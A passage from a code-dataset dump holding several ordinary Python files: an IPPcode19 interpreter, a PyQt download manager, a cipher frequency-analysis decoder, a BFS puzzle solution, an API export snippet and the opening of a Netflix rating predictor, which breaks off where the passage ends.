\"-h\" in sys.argv) and len(sys.argv) > 2:\n err.exit_script(err.missing_parameter)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--source\", dest=\"source_file\", help=\"input xml file, stdin will be used by default if not set\")\nparser.add_argument(\"--input\", dest=\"input_file\", help=\"input for source code interpretation, stdin will be used by default if not set (either --source or --input parameter must be set)\")\nparser.add_argument(\"--stats\", dest=\"stats_file\", help=\"output file for some interpretation statistics\")\nparser.add_argument(\"--insts\", dest=\"stats_insts\", help=\"prints amount of interpreted instructions into file set by --stats parameter\", action=\"store_true\")\nparser.add_argument(\"--vars\", dest=\"stats_vars\", help=\"prints amount of defined variables into file set by --stats parameter\", action=\"store_true\")\nparser.add_argument(\"--debug\", dest=\"debug_mode\", help=\"runs the interpreter in debug mode\", action=\"store_true\")\nargs = parser.parse_args()\n\n# Both source file and input file not set\nif (args.source_file == None and args.input_file == None):\n err.exit_script(err.missing_parameter)\n\n# Read instructions from source file or stdin\nif (args.source_file != None):\n source_file_stream = args.source_file\nelse:\n source_file_stream = sys.stdin\n\n# Check whether source XML is well-formed\ntry:\n xml = minidom.parse(source_file_stream)\nexcept:\n err.exit_script(err.xml)\n\n# Read input from stdin or redirect input file to stdin\nif (args.input_file != None):\n old_stdin = sys.stdin\n try:\n sys.stdin = open(args.input_file)\n except:\n err.exit_script(err.output_file)\n\n# Check for STATI extension parameters\nif (args.stats_insts or args.stats_vars):\n if (args.stats_file != None):\n try:\n stats_file_stream = open(args.stats_file, \"w\")\n except:\n err.exit_script(err.output_file)\n else:\n err.exit_script(err.missing_parameter)\n\n# Custom debug mode\ndebug = False\nif (args.debug_mode):\n debug = True\n\n### Reading XML source file ###\n# Check for language=\"IPPcode19\"\nif \"language\" not in xml.firstChild.attributes:\n err.exit_script(err.lexical_or_syntax)\nif xml.firstChild.attributes[\"language\"].value != \"IPPcode19\":\n err.exit_script(err.lexical_or_syntax)\n\n# Check for excessive text in XML\nfor node in xml.firstChild.childNodes:\n if node.nodeType == node.TEXT_NODE:\n if (not node.nodeValue.isspace()):\n err.exit_script(err.lexical_or_syntax)\n elif node.nodeType == node.ELEMENT_NODE:\n if node.localName != \"instruction\":\n err.exit_script(err.lexical_or_syntax)\n\n# Check for order attribute in instruction elements\ninstructions = xml.getElementsByTagName(\"instruction\")\nfor err.inst_order in range (0, len(instructions)):\n if \"order\" not in instructions[err.inst_order].attributes:\n err.exit_script(err.lexical_or_syntax)\n\n# Sort instruction elements by order number\ninstructions.sort(key=lambda x: int(x.attributes[\"order\"].value))\n\n# Check for valid order sequence\norder_check = 1\nfor inst in instructions:\n if order_check != int(inst.attributes[\"order\"].value):\n err.exit_script(err.lexical_or_syntax)\n order_check += 1\n\n### Interpretation ###\n# 1st passing of all instructions to define labels\nlabels = Labels()\nerr.inst_order = 0\nfor inst_order in range (0, len(instructions)):\n err.inst_order += 1\n inst = Instruction(instructions[inst_order])\n if inst.opcode == \"LABEL\":\n labels.add(inst.arg1, inst_order)\n\n# 2nd passing of all instructions to interprete them\ninst_order = 0\ninst_exectuted = 0\nerr.inst_order = 0\nsymtable = SymTable()\n\nwhile inst_order < len(instructions):\n err.inst_order += 1\n inst = Instruction(instructions[inst_order])\n \n if debug == True:\n inst.debug()\n\n if inst.opcode == \"CREATEFRAME\":\n symtable.create_frame()\n elif inst.opcode == \"PUSHFRAME\":\n symtable.push_frame()\n elif inst.opcode == \"POPFRAME\":\n symtable.pop_frame()\n elif inst.opcode == \"RETURN\":\n inst_order = labels.ret()\n elif inst.opcode == \"BREAK\":\n sys.stderr.write(\"Instructions order: \" + str(inst_order + 1) + \"\\n\")\n sys.stderr.write(\"Instructions executed: \" + str(inst_exectuted + 1) + \"\\n\")\n symtable.print()\n elif inst.opcode == \"CLEARS\":\n symtable.clears()\n\n #1 arg: var\n elif inst.opcode == \"DEFVAR\":\n symtable.defvar(inst.arg1)\n elif inst.opcode == \"POPS\":\n symtable.set_var(inst.arg1, symtable.pops())\n\n #1 arg: label\n elif inst.opcode == \"JUMP\":\n inst_order = labels.jump(inst.arg1)\n\n elif inst.opcode == \"CALL\":\n inst_order = labels.call(inst.arg1, inst_order)\n\n #1 arg: symb\n elif inst.opcode == \"PUSHS\":\n symtable.pushs(inst.arg1)\n elif inst.opcode == \"WRITE\":\n symtable.get_value(inst.arg1).write(sys.stdout)\n\n elif inst.opcode == \"EXIT\":\n exit_arg = symtable.get_value(inst.arg1)\n \n if exit_arg.datatype == \"int\":\n if 0 <= exit_arg.value <= 49:\n if args.stats_file != None:\n print_stats_to_file(stats_file_stream, inst_exectuted, symtable.max_defined_vars)\n sys.exit(exit_arg.value)\n else:\n err.exit_script(err.operand_value)\n else:\n err.exit_script(err.operand_type)\n \n elif inst.opcode == \"DPRINT\":\n symtable.get_value(inst.arg1).write(sys.stderr)\n\n #2 arg: var symb\n elif inst.opcode == \"MOVE\":\n move_arg = symtable.get_value(inst.arg2)\n symtable.set_var(inst.arg1, move_arg)\n\n elif inst.opcode == \"INT2CHAR\" or inst.opcode == \"INT2CHARS\":\n if inst.opcode == \"INT2CHAR\":\n operand1_arg = symtable.get_value(inst.arg2)\n else:\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"string\"\n\n if operand1_arg.datatype == \"int\":\n if 0 <= operand1_arg.value <= 1114111:\n result_arg.value = chr(operand1_arg.value)\n else:\n err.exit_script(err.string_operation)\n else:\n err.exit_script(err.operand_type)\n \n if inst.opcode == \"INT2CHAR\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"STRLEN\":\n operand1_arg = symtable.get_value(inst.arg2)\n result_arg = Arg(None)\n result_arg.datatype = \"int\"\n\n if operand1_arg.datatype == \"string\":\n result_arg.value = len(operand1_arg.value)\n else:\n err.exit_script(err.operand_type)\n symtable.set_var(inst.arg1, result_arg)\n\n elif inst.opcode == \"TYPE\":\n src_var = symtable.get_var_even_uninitialised(inst.arg2)\n dst_var = Arg(None)\n dst_var.datatype = \"string\"\n\n if src_var == None:\n dst_var.value = \"\"\n elif src_var.datatype == \"int\":\n dst_var.value = \"int\"\n elif src_var.datatype == \"bool\":\n dst_var.value = \"bool\"\n elif src_var.datatype == \"string\":\n dst_var.value = \"string\"\n elif src_var.datatype == \"nil\":\n dst_var.value = \"nil\"\n elif src_var.datatype == \"float\":\n dst_var.value = \"float\"\n \n symtable.set_var(inst.arg1, dst_var)\n\n #2 arg: var type\n elif inst.opcode == \"READ\":\n input_arg = Arg(None)\n input_arg.read(inst.arg2.value)\n symtable.set_var(inst.arg1, input_arg)\n\n #3 arg: var symb symb\n elif inst.opcode == \"ADD\" or inst.opcode == \"ADDS\":\n if inst.opcode == \"ADD\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n\n result_arg = Arg(None)\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n result_arg.datatype = \"int\"\n result_arg.value = operand1_arg.value + operand2_arg.value\n elif operand1_arg.datatype == \"float\" and operand2_arg.datatype == \"float\":\n result_arg.datatype = \"float\"\n result_arg.value = operand1_arg.value + operand2_arg.value\n else:\n err.exit_script(err.operand_type)\n \n if inst.opcode == \"ADD\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"SUB\" or inst.opcode == \"SUBS\":\n if inst.opcode == \"SUB\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n result_arg.datatype = \"int\"\n result_arg.value = operand1_arg.value - operand2_arg.value\n elif operand1_arg.datatype == \"float\" and operand2_arg.datatype == \"float\":\n result_arg.datatype = \"float\"\n result_arg.value = operand1_arg.value - operand2_arg.value\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"SUB\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"MUL\" or inst.opcode == \"MULS\":\n if inst.opcode == \"MUL\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n result_arg.datatype = \"int\"\n result_arg.value = operand1_arg.value * operand2_arg.value\n elif operand1_arg.datatype == \"float\" and operand2_arg.datatype == \"float\":\n result_arg.datatype = \"float\"\n result_arg.value = operand1_arg.value * operand2_arg.value\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"MUL\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"IDIV\" or inst.opcode == \"IDIVS\":\n if inst.opcode == \"IDIV\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"int\"\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n if operand2_arg.value == 0:\n err.exit_script(err.operand_value)\n else:\n result_arg.value = operand1_arg.value // operand2_arg.value\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"IDIV\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"DIV\" or inst.opcode == \"DIVS\":\n if inst.opcode == \"DIV\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"float\"\n\n if operand1_arg.datatype == \"float\" and operand2_arg.datatype == \"float\":\n if operand2_arg.value == 0:\n err.exit_script(err.operand_value)\n else:\n result_arg.value = operand1_arg.value / operand2_arg.value\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"DIV\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"LT\" or inst.opcode == \"LTS\":\n if inst.opcode == \"LT\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n result_arg.value = \"false\"\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n if operand1_arg.value < operand2_arg.value:\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\":\n if operand1_arg.value == \"false\" and operand2_arg.value == \"true\":\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\":\n if operand1_arg.value < operand2_arg.value:\n result_arg.value = \"true\"\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"LT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"GT\" or inst.opcode == \"GTS\":\n if inst.opcode == \"GT\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n result_arg.value = \"false\"\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n if operand1_arg.value > operand2_arg.value:\n result_arg.value = \"true\"\n\n elif operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\":\n if operand1_arg.value == \"true\" and operand2_arg.value == \"false\":\n result_arg.value = \"true\"\n\n elif operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\":\n if operand1_arg.value > operand2_arg.value:\n result_arg.value = \"true\"\n\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"GT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"EQ\" or inst.opcode == \"EQS\":\n if inst.opcode == \"EQ\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n result_arg.value = \"false\"\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n if operand1_arg.value == operand2_arg.value:\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\":\n if operand1_arg.value == operand2_arg.value:\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\":\n if operand1_arg.value == operand2_arg.value:\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"nil\" and operand2_arg.datatype == \"nil\":\n if operand1_arg.value == operand2_arg.value:\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"nil\" or operand2_arg.datatype == \"nil\":\n ...\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"EQ\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"AND\" or inst.opcode == \"ANDS\":\n if inst.opcode == \"AND\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n\n if operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\":\n if operand1_arg.value == \"true\" and operand2_arg.value == \"true\":\n result_arg.value = \"true\"\n else:\n result_arg.value = \"false\"\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"AND\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"OR\" or inst.opcode == \"ORS\":\n if inst.opcode == \"OR\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n\n if operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\":\n if operand1_arg.value == \"true\" or operand2_arg.value == \"true\":\n result_arg.value = \"true\"\n else:\n result_arg.value = \"false\"\n else:\n err.exit_script(err.operand_type) \n\n if inst.opcode == \"OR\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"NOT\" or inst.opcode == \"NOTS\":\n if inst.opcode == \"NOT\":\n operand1_arg = symtable.get_value(inst.arg2)\n else:\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n\n if operand1_arg.datatype == \"bool\":\n if operand1_arg.value == \"true\":\n result_arg.value = \"false\"\n else:\n result_arg.value = \"true\"\n else:\n err.exit_script(err.operand_type) \n\n if inst.opcode == \"NOT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"STRI2INT\" or inst.opcode == \"STRI2INTS\":\n if inst.opcode == \"STRI2INT\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"int\"\n\n if operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"int\":\n if 0 <= operand2_arg.value < len(operand1_arg.value):\n result_arg.value = ord(operand1_arg.value[operand2_arg.value])\n else:\n err.exit_script(err.string_operation)\n else:\n err.exit_script(err.operand_type)\n if inst.opcode == \"STRI2INT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"FLOAT2INT\" or inst.opcode == \"FLOAT2INTS\":\n if inst.opcode == \"FLOAT2INT\":\n operand1_arg = symtable.get_value(inst.arg2)\n else:\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"int\"\n\n if operand1_arg.datatype == \"float\":\n result_arg.value = int(operand1_arg.value)\n else:\n err.exit_script(err.operand_type)\n if inst.opcode == \"FLOAT2INT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"INT2FLOAT\" or inst.opcode == \"INT2FLOATS\":\n if inst.opcode == \"INT2FLOAT\":\n operand1_arg = symtable.get_value(inst.arg2)\n else:\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"float\"\n\n if operand1_arg.datatype == \"int\":\n result_arg.value = float(operand1_arg.value)\n else:\n err.exit_script(err.operand_type)\n if inst.opcode == \"INT2FLOAT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"CONCAT\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n \n if operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\":\n result_arg = Arg(None)\n result_arg.datatype = \"string\"\n result_arg.value = operand1_arg.value + operand2_arg.value\n symtable.set_var(inst.arg1, result_arg)\n else:\n err.exit_script(err.operand_type)\n symtable.set_var(inst.arg1, result_arg)\n\n elif inst.opcode == \"GETCHAR\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n result_arg = Arg(None)\n result_arg.datatype = \"int\"\n\n if operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"int\":\n if 0 <= operand2_arg.value < len(operand1_arg.value):\n result_arg.value = operand1_arg.value[operand2_arg.value]\n else:\n err.exit_script(err.string_operation)\n else:\n err.exit_script(err.operand_type)\n symtable.set_var(inst.arg1, result_arg)\n\n elif inst.opcode == \"SETCHAR\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n result_arg = symtable.get_var(inst.arg1)\n\n if result_arg.datatype == \"string\" and operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"string\":\n if 0 <= operand1_arg.value < len(result_arg.value) and len(operand2_arg.value) > 0:\n result_string = list(result_arg.value)\n result_string[operand1_arg.value] = operand2_arg.value[0]\n result_arg.value = \"\".join(result_string)\n else:\n err.exit_script(err.string_operation)\n else:\n err.exit_script(err.operand_type)\n symtable.set_var(inst.arg1, result_arg)\n\n #3 arg: label symb symb\n elif inst.opcode == \"JUMPIFEQ\" or inst.opcode == \"JUMPIFEQS\":\n if inst.opcode == \"JUMPIFEQ\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\" or \\\n operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\" or \\\n operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\" or \\\n operand1_arg.datatype == \"nil\" and operand2_arg.datatype == \"nil\":\n if operand1_arg.value == operand2_arg.value:\n inst_order = labels.jump(inst.arg1)\n else:\n err.exit_script(err.operand_type)\n \n elif inst.opcode == \"JUMPIFNEQ\" or inst.opcode == \"JUMPIFNEQS\":\n if inst.opcode == \"JUMPIFNEQ\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand1_arg = symtable.pops()\n operand2_arg = symtable.pops()\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\" or \\\n operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\" or \\\n operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\" or \\\n operand1_arg.datatype == \"nil\" and operand2_arg.datatype == \"nil\":\n if operand1_arg.value != operand2_arg.value:\n inst_order = labels.jump(inst.arg1)\n else:\n err.exit_script(err.operand_type)\n\n inst_order += 1\n inst_exectuted += 1\n\n if args.stats_vars:\n symtable.count_vars()\n\nif args.stats_file != None:\n print_stats_to_file(stats_file_stream, inst_exectuted, symtable.max_defined_vars) \n","sub_path":"interpret.py","file_name":"interpret.py","file_ext":"py","file_size_in_byte":24587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"479338539","text":"from PyQt5.QtWidgets import *\nimport sys\nimport urllib.request\nfrom config import memory\nfrom PyQt5.uic import loadUiType\nimport urllib.request\nfrom datetime import date\nimport os\n\n\nfrom config.database import db\n\ncursor = db.cursor()\n\nui, _ = loadUiType('gui_test.ui')\n\nclass MainApp(QMainWindow , ui):\n def __init__(self , parent=None):\n super(MainApp , self).__init__(parent)\n QMainWindow.__init__(self)\n self.setupUi(self)\n self.InitUI()\n \n\n def InitUI(self):\n self.tabWidget.tabBar().setVisible(False)\n self.pushButton.clicked.connect(self.Open_Download)\n self.pushButton_2.clicked.connect(self.Open_Settings)\n self.pushButton_3.clicked.connect(self.Open_History)\n self.path_button.clicked.connect(self.Get_Path)\n self.download.clicked.connect(self.Get_Download)\n \n\n def Open_Download(self):\n self.tabWidget.setCurrentIndex(0)\n\n def Open_Settings(self):\n self.tabWidget.setCurrentIndex(1)\n\n def Open_History(self):\n self.tabWidget.setCurrentIndex(2)\n self.tableWidget.setRowCount(0)\n self.View_Database()\n \n\n def View_Database(self):\n query = \"SELECT * FROM download_manager\"\n cursor.execute(query)\n myresult = cursor.fetchall()\n for row_number, row_data in enumerate(myresult):\n self.tableWidget.insertRow(row_number)\n for column_number, data in enumerate(row_data):\n self.tableWidget.setItem(row_number, column_number, QTableWidgetItem(str(data)))\n\n\n def Get_Path(self): \n self.path = QFileDialog.getExistingDirectory(self, 'Select your folder:')\n print(str(self.path))\n self.path = memory.path(str(self.path))+'\\\\'\n self.pathField.setText(self.path)\n print(self.path)\n\n\n def Get_Download(self):\n sql = \"insert into download_manager(file_name, link, file_size, date_download) values (%s, %s, %s, %s)\"\n self.progressBar.setValue(0)\n arr = str(self.urlText.text()).split('/')\n for i in ['jpg','png', 'pdf','exe']:\n if i in str(self.urlText.text()):\n self.path = self.path + arr[-1]\n urllib.request.urlretrieve(str(self.urlText.text()), self.path)\n value = (arr[-1], str(self.urlText.text()), memory.convert(os.stat(self.path).st_size), date.today().strftime('%Y-%m-%d'))\n cursor.execute(sql, value)\n db.commit()\n break\n prgrs = os.stat(self.path).st_size\n for i in range(prgrs):\n self.progressBar.setValue(i)\n \n\ndef main():\n app = QApplication(sys.argv)\n window = MainApp()\n window.show()\n app.exec_()\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"125325139","text":"import re\nfrom encode import encode\nfrom collections import Counter\nfrom frequency import frequency as frec\n\n\ndef war():\n f = open('warFirstPart.txt')\n text = f.read().lower()\n bigrammsGlobalOrder = Counter()\n for word in re.findall(r'[а-яё]+', text):\n for i in range(len(word) - 1):\n bigrammsGlobalOrder[word[i] + word[i + 1]] += 1\n bigrammsGlobalOrder = list(map(lambda item: item[0], bigrammsGlobalOrder.most_common()))\n\n pos = 0\n while pos < len(text):\n match = re.compile(r'[а-яё]+').match(text , pos)\n if match:\n text = text[:match.start()] + encode(word=match[0]) + text[match.end():]\n pos = match.end()\n else:\n pos += 1\n\n charsCount = Counter()\n frequency = dict(sorted(list(frec().items()), key=lambda item: item[1], reverse=True))\n frequencyKeys = list(frequency.keys())\n for char in text:\n if char in frequencyKeys:\n charsCount[char] += 1\n\n decoder = {}\n\n for i in range(len(frequency)):\n decoder[charsCount[i]] = frequencyKeys[i]\n\n charsCount = list(dict(charsCount.most_common()).keys())\n for char in text:\n if char in frequencyKeys:\n decoder[char] = frequencyKeys[charsCount.index(char)]\n\n bigramms = Counter()\n open('war_encoded.txt', 'w').write(text)\n\n for word in re.findall(r'[а-яё]+', text):\n for i in range(len(word) - 1):\n bigramms[word[i] + word[i + 1]] += 1\n\n bigramms = list(map(lambda item: item[0], bigramms.most_common(20)))\n\n\n bigrammsDecoder = {}\n for i in range(len(bigramms)):\n if bigramms[i][0] not in bigrammsDecoder.keys() and bigramms[i][1] not in bigrammsDecoder.keys():\n bigrammsDecoder[bigramms[i][0]] = bigrammsGlobalOrder[i][0]\n bigrammsDecoder[bigramms[i][1]] = bigrammsGlobalOrder[i][1]\n\n decoder = decoder | bigrammsDecoder\n\n pos = 0\n decoderKeys = decoder.keys()\n while pos < len(text):\n match = re.compile(r'[а-яё]').match(text, pos)\n if match and match[0] in decoderKeys:\n text = text[:match.start()] + decoder[match[0]] + text[match.end():]\n pos = match.end()\n else:\n pos += 1\n\n open('war_decoded.txt', 'w').write(text)\n\n","sub_path":"war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"183661943","text":"from Speeding import *\n\n#speedFinesData = finesFileCheck()\n#speedFines, formattingErrorForFineRates = finesFileFormatCheck(speedFinesData)\n\n#maxSpeed = ((speedFines[-1])[1])\n#maxFine = ((speedFines[-1])[2])\n\nif formattingErrorForFineRates is True:\n # include a option to simply create a new fine rates file in program\n continueState = continueOrExitForFines()\n continueOrExitDueToFormat(continueState)\n\nspeedFileName = speedFileCheck()\ndataDict, speedFormatError = speedFileFormatCheck(speedFileName)\nif speedFormatError is True:\n continueState = speedDataFormatError()\n continueOrExitDueToFormat(continueState)\n\ncarSpeeds = calculateSpeedPerHr(dataDict)\ncalculateFines(carSpeeds)","sub_path":"Final Working Program + Testing Files/Zhi Feng - FINAL HAND IN/Zhi Feng Chen - US Speeding Program/Older Version/V3 Main.py","file_name":"V3 Main.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"207125067","text":"from collections import deque\r\n\r\nN, K = map(int, input().split())\r\nMAX_SIZE = 100001\r\n\r\nq = deque()\r\nq.append(N)\r\n\r\ncnt=0\r\ncheck=[-1]* MAX_SIZE\r\ncheck[N]=0\r\nwhile q:\r\n x = q.popleft()\r\n if x==K:\r\n cnt+=1\r\n for y in [x * 2, x + 1, x - 1]:\r\n if 0 <= y < MAX_SIZE:\r\n if check[y]==-1 or check[y]>=check[x]+1: \r\n check[y]=check[x]+1\r\n q.append(y)\r\n\r\nprint(check[K])\r\nprint(cnt)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"BOJ12851.py","file_name":"BOJ12851.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"101097549","text":"import requests\n\n# get your API key https://app.ioannotator.com/api\nparams= {'apikey': 'add your API key here',\n 'dataset': 'add your dataset ID here',}\n\napi = 'https://api.ioannotator.com/export'\n\n\nx = requests.get(api, params=params)\n\nprint(x.text)","sub_path":"python/text/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"278731577","text":"import math\n\n\ndef netflix_read(r):\n\ts = r.readline().rstrip('\\n')\n\tif s == \"\":\n\t\treturn []\n\telse:\n\t\treturn s\n\n\ndef rmse(a,b):\n\n\tassert len(a) == len(b)\n\tsum = 0\n\tfor n in range(len(a)):\n\t\tx = a[n] - b[n]\n\t\tsum += (x**2)\n\tmean = sum/len(a)\n\tr = math.sqrt(mean)\n\treturn r\n\n\n# -----\n# make dictionary rpc_cache\n# average ratings per customer\n# -----\n\nrpc_file = open('/u/prat0318/netflix-tests/ctd446-userAverageRating.txt','r')\nrpc_cache = eval(rpc_file.readline())\n\n\n\n# -----\n# make dictionary rpm_cache\n# average ratings per movie\n# -----\n\nrpm_file = open('/u/prat0318/netflix-tests/php274-MovieRatings.txt','r')\nrpm_cache = {}\nreading = True\nwhile reading == True:\n\trpm_line = rpm_file.readline()\n\tif rpm_line == \"\":\n\t\treading = False\n\telse:\n\t\tlineKey, lineValue = rpm_line.split(\":\")\n\n\t\trpm_cache[str(lineKey)] = str(lineValue[0:len(lineValue)-1])\n\n# ------\n# make dictionary probe_answers\n# real ratings for data in probe.txt\n# ------\n\nprobe_file = open('/u/prat0318/netflix-tests/erb988+np6593-ProbeAnswersDictionary.txt','r')\nprobe_answers = eval(probe_file.readline())\n\n\n# -----\n# cache with movie release dates\n# -----\n\ndate_file = open('/u/prat0318/netflix-tests/ccm2493-movie_info_cache.txt','r', errors ='ignore')\ndate_cache = eval(date_file.readline())\n\n\n\n\n\n# -----\n# lists will be passed to rmse.py\n# -----\n\nglobal prediction_list\nprediction_list = []\n\nglobal actual_list\nactual_list = []\n\n\n# -----\n# predict what one customer will rate one movie\n# -----\n\ndef predict(cust, movie):\n\n\n\n\n\tmovie_average = float(rpm_cache[movie])\n\tcustomer_average = float(rpc_cache[cust])\n\n\tassert 1 <= movie_average <= 5\n\tassert 1 <= customer_average <= 5\n\n\tmovie_offset = 0\n\tcustomer_offset = 0\n\tdate_offset = 0\n\n\t# movie offset conditionals\n\n\tif round(movie_average) == 1:\n\t\tmovie_offset = -0.4\n\telif round(movie_average) == 2:\n\t\tmovie_offset = -0.1\n\telif round(movie_average) == 3:\n\t\tmovie_offset = 0\n\telif round(movie_average) == 